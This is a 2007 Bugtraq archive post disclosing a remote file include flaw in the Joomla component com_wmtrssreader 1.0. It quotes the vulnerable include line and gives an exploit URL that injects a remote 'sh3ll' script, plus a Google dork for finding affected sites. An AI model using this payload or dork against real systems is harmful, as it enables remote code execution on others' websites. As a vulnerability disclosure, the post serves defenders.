Bugtraq: wmtrssreader joomla component 1.0 Remote File Include Vulnerability

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq mailing list archives

wmtrssreader joomla component 1.0 Remote File Include Vulnerability

From: cyber-crime () sibersavascilar com
Date: 10 Oct 2007 06:47:12 -0000

#########################################################################################################
# wmtrssreader joomla component 1.0 Remote File Include Vulnerability

 Component       : com_wmtrssreader version 1.0
 Download script : http://www.webmaster-tips.net/flash-rss-reader.html (you must register)
 Dicovered by    : Cyber-Crime
 Contact         : cyber-crime () hotmail com
 Orginal         : http://www.sibersavascilar.com/category/security

==================================================================================================================================

# Vulnerable found in /administrator/components/com_wmtrssreader/admin.wmtrssreader.php


include( "$mosConfig_live_site/components/com_wmtrssreader/about.html" );


# Exploit

 
http://localhost/path/administrator/components/com_wmtrssreader/admin.wmtrssreader.php?mosConfig_live_site=sh3ll?


# google dork

 inurl:com_wmtrssreader

==================================================================================================================================

# Greetz :  www.sibersavascilar.com  www.sibersavascilar.net www.sibersavascilar.org


==================================================================================================================================

#########################################################################################################

By Date By Thread

Current thread:

wmtrssreader joomla component 1.0 Remote File Include Vulnerability cyber-crime (Oct 10)